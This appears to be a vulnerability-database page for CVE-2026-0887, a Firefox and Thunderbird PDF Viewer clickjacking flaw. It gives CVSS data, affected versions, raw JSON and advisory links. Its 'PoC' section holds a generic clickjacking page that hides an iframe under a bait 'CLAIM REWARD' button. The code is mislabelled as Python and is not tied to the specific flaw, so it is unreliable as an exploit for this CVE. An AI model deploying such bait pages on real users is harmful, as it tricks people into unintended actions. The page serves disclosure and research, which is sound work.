Security Vulnerability Report
中文
CVE-2026-0887 CVSS 4.3 MEDIUM

CVE-2026-0887

Published: 2026-01-13 14:16:39
Last Modified: 2026-04-13 15:17:18
Source: [email protected]

Description

Clickjacking issue, information disclosure in the PDF Viewer component. This vulnerability was fixed in Firefox 147, Firefox ESR 140.7, Thunderbird 147, and Thunderbird 140.7.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:* - VULNERABLE
Mozilla Firefox < 147
Mozilla Firefox ESR < 140.7
Mozilla Thunderbird < 147
Mozilla Thunderbird ESR < 140.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2026-0887 Clickjacking PoC --> <!DOCTYPE html> <html> <head> <title>CVE-2026-0887 Clickjacking PoC</title> <style> body { font-family: Arial, sans-serif; background: #f0f0f0; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; } .container { text-align: center; } .click-bait { position: relative; z-index: 2; padding: 20px 40px; font-size: 18px; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); color: white; border: none; border-radius: 8px; cursor: pointer; box-shadow: 0 4px 15px rgba(0,0,0,0.2); } .click-bait:hover { transform: scale(1.05); } iframe { position: absolute; top: 0; left: 0; width: 100%; height: 100%; opacity: 0; z-index: 1; border: none; } .warning { color: #d32f2f; font-weight: bold; margin-bottom: 20px; } </style> </head> <body> <div class="container"> <p class="warning">Educational PoC - For Security Research Only</p> <h2>Click here to claim your prize!</h2> <button class="click-bait">CLAIM REWARD</button> <!-- Hidden iframe targeting vulnerable PDF Viewer --> <!-- Replace URL with actual vulnerable Firefox/Thunderbird PDF Viewer URL --> <iframe src="https://vulnerable-site.com/pdf viewer URL" sandbox="allow-same-origin allow-scripts allow-forms"> </iframe> </div> <script> // Log click events for demonstration document.querySelector('.click-bait').addEventListener('click', function() { console.log('Clickjacking attempt triggered'); alert('This demonstrates how a hidden iframe can capture user clicks'); }); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0887", "sourceIdentifier": "[email protected]", "published": "2026-01-13T14:16:39.240", "lastModified": "2026-04-13T15:17:17.927", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Clickjacking issue, information disclosure in the PDF Viewer component. This vulnerability was fixed in Firefox 147, Firefox ESR 140.7, Thunderbird 147, and Thunderbird 140.7."}, {"lang": "es", "value": "Problema de clickjacking, revelación de información en el componente Visor de PDF. Esta vulnerabilidad afecta a Firefox &lt; 147, Firefox ESR &lt; 140.7, Thunderbird &lt; 147 y Thunderbird &lt; 140.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.7.0", "matchCriteriaId": "A2FC50B3-5A36-4702-8CF6-CC732E3B148B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "147.0", "matchCriteriaId": "E06AF540-011D-4249-9815-3A4609DD26D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.7.0", "matchCriteriaId": "BFBAB968-3244-4970-8D02-CCF9D5FB958D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:*", "versionEndExcluding": "147.0", "matchCriteriaId": "47B67C0A-B05F-4212-9255-0446302237A5"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2006500", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-01/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-03/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-04/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-05/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.